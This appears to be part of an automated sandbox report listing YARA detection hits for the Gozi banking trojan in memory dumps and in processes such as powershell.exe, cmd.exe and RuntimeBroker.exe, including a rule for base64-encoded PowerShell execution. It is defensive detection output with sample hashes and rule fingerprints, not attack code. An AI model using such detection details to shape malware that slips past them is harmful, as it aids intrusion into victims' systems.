Source: 00000023.00000003.682986739.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814825751.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803878408.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683117141.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767939746.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765039957.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.765207667.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000002.827171942.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683052464.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000003.767821170.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344972569.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682539634.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345107606.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682736014.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000003.712982128.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000002.778497815.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.814713525.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000013.00000002.860622856.000002240CD02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.345011461.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822550991.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705598553.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000059.00000003.822358925.000001AF8BC9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000002D.00000002.856230458.00000191D3DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.705458137.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682832881.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775181381.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000058.00000003.803740044.0000024EF5BDC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.451792745.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344881693.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000003.344788105.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000029.00000003.708468891.000001CEDBA7C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000043.00000003.775368587.000001FA9DD8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682410000.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: 00000000.00000002.498174750.0000000001318000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000001B.00000002.858783348.000001D023E02000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.682621929.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000000.00000003.442938704.0000000003F08000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 0000003E.00000002.795032491.000001993459C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: 00000023.00000003.683222673.0000000003558000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: Lx6.exe PID: 1172, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4292, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 3124, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4372, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: RuntimeBroker.exe PID: 4552, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 5832, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Source: Process Memory Space: cmd.exe PID: 1920, type: MEMORYSTR	Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
